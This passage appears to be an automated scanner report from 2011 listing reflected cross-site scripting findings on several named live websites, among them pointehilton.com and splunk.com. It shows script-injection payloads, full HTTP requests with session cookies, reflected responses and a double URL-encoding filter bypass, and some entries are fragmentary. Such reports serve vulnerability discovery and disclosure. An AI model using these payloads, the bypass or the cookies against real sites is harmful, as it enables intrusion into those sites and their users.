GET /contact/index.cfm?dd987"><script>alert(1)</script>09d3033758=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/contact/index.cfm?dd987"><script>alert(1)</script>09d3033758=1" > ...[SNIP]...
4.351. http://www.pointehilton.com/employment/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pointehilton.com
Path: /employment/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e22"><script>alert(1)</script>d6b9d95a80b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /employment/index.cfm?b2e22"><script>alert(1)</script>d6b9d95a80b=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/employment/index.cfm?b2e22"><script>alert(1)</script>d6b9d95a80b=1" > ...[SNIP]...
4.352. http://www.pointehilton.com/favicon.ico [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pointehilton.com
Path: /favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eba4"><script>alert(1)</script>5b859fb2210 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.ico?2eba4"><script>alert(1)</script>5b859fb2210=1 HTTP/1.1 Host: www.pointehilton.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=16197269; CFTOKEN=78240628; BIGipServerIMS-6=773065226.20480.0000; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; __utmc=69452433; __utmb=69452433.1.10.1296944075; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900
Response
HTTP/1.1 404 Not Found Connection: close Date: Sat, 05 Feb 2011 22:35:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/404.cfm?404;http://www.pointehilton.com:80/favicon.ico?2eba4"><script>alert(1)</script>5b859fb2210=1" > ...[SNIP]...
4.353. http://www.pointehilton.com/sitemap/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pointehilton.com
Path: /sitemap/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e331"><script>alert(1)</script>86cfb649072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap/index.cfm?9e331"><script>alert(1)</script>86cfb649072=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/sitemap/index.cfm?9e331"><script>alert(1)</script>86cfb649072=1" > ...[SNIP]...
4.354. http://www.pointehilton.com/special-offers/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pointehilton.com
Path: /special-offers/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce71"><script>alert(1)</script>42f3414c72b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /special-offers/index.cfm?2ce71"><script>alert(1)</script>42f3414c72b=1 HTTP/1.1 Host: www.pointehilton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296936876900:ss=1296936876900; CFTOKEN=78240628; __utmz=69452433.1296944075.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; CFID=16197269; __utma=69452433.16251013.1296944075.1296944075.1296944075.1; BIGipServerIMS-6=773065226.20480.0000; __utmc=69452433; __utmb=69452433.1.10.1296944075;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:11:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... <link rel="canonical" href="http://www.pointehilton.com/special-offers/index.cfm?2ce71"><script>alert(1)</script>42f3414c72b=1" > ...[SNIP]...
4.355. http://www.protopage.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.protopage.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d689'%3balert(1)//dc93207037d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d689';alert(1)//dc93207037d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2d689'%3balert(1)//dc93207037d=1 HTTP/1.1 Host: www.protopage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0a42<a>5296194bfd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-bdv9UMaVrliL2a0a42<a>5296194bfd7 HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sun, 06 Feb 2011 16:11:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> p-bdv9UMaVrliL2a0a42<a>5296194bfd7</em> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b61e"><a>69886d6c80c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-bdv9UMaVrliL26b61e"><a>69886d6c80c HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sun, 06 Feb 2011 16:11:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f5e"><script>alert(1)</script>69f7787792 was submitted in the REST URL parameter 2. This input was echoed as 68f5e\"><script>alert(1)</script>69f7787792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/gambar68f5e"><script>alert(1)</script>69f7787792 HTTP/1.1 Host: www.scare666.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:10:57 GMT Server: Apache X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding X-Pingback: http://www.scare666.com/xmlrpc.php Cache-Control: max-age=29030400, public Expires: Sat, 07 Jan 2012 22:10:57 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile ...[SNIP]... <meta name="description" content="News about gambar68f5e\"><script>alert(1)</script>69f7787792 0 at scare666.com. Explore gambar68f5e\"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6823d<script>alert(1)</script>3f01d4d8a23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/gambar6823d<script>alert(1)</script>3f01d4d8a23 HTTP/1.1 Host: www.scare666.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:11:01 GMT Server: Apache X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding X-Pingback: http://www.scare666.com/xmlrpc.php Cache-Control: max-age=29030400, public Expires: Sat, 07 Jan 2012 22:11:01 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head profile ...[SNIP]... <h2>gambar6823d<script>alert(1)</script>3f01d4d8a23</h2> ...[SNIP]...
4.360. http://www.shoppinga.de/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.shoppinga.de
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd2d5"><script>alert(1)</script>e3b5e976e9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bd2d5"><script>alert(1)</script>e3b5e976e9e=1 HTTP/1.1 Host: www.shoppinga.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fac7%253cscript%253ealert%25281%2529%253c%252fscript%253e7d5d02802ae was submitted in the REST URL parameter 1. This input was echoed as 8fac7<script>alert(1)</script>7d5d02802ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /getthumbnail.ashx8fac7%253cscript%253ealert%25281%2529%253c%252fscript%253e7d5d02802ae?width=182&file=9781556428517.gif HTTP/1.1 Host: www.slackbooks.com Proxy-Connection: keep-alive Referer: http://www.slackbooks.com/essentialknee Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=005mudrubsn3zlj31keaeuvq
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:36:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 12256
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.362. http://www.spiele365.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.spiele365.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24997"><script>alert(1)</script>8c1d99e1e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?24997"><script>alert(1)</script>8c1d99e1e7c=1 HTTP/1.1 Host: www.spiele365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:14:28 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=ehsibgt6v78cfkjerdu0r5trp06gq2le; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 24854
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <input type="hidden" name="return" value="/?24997"><script>alert(1)</script>8c1d99e1e7c=1" /> ...[SNIP]...
4.363. http://www.splunk.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8264f--><script>alert(1)</script>e135a08d7b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?8264f--><script>alert(1)</script>e135a08d7b0=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: b89e9b9024c0d76093fbc788f12f35711296944034 Last-Modified: Sat, 05 Feb 2011 22:13:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 55941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:dc="http://purl.org/d ...[SNIP]... <!-- SID:25 GEN:2011-02-05T14:13:54-08:00 URL:/?8264f--><script>alert(1)</script>e135a08d7b0=1 --> ...[SNIP]...
The value of the r request parameter is copied into an HTML comment. The payload 11427--><script>alert(1)</script>361b64d9efa was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?r=header11427--><script>alert(1)</script>361b64d9efa HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 4255345ea8872fc035d4f1a1d367c5e61296944030 Last-Modified: Sat, 05 Feb 2011 22:13:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 56033
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:dc="http://purl.org/d ...[SNIP]... <!-- SID:25 GEN:2011-02-05T14:13:50-08:00 URL:/?r=header11427--><script>alert(1)</script>361b64d9efa --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93bd9'-alert(1)-'5693c75ab64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base93bd9'-alert(1)-'5693c75ab64/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... geVersion( ) { var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base93bd9'-alert(1)-'5693c75ab64/'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base93bd9'-alert(1)-'5693c75ab64/"; }
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b19b8"><script>alert(1)</script>4678698329e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /baseb19b8"><script>alert(1)</script>4678698329e/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/baseb19b8"><script>alert(1)</script>4678698329e/"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload b1745--><script>alert(1)</script>cb09324f9b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
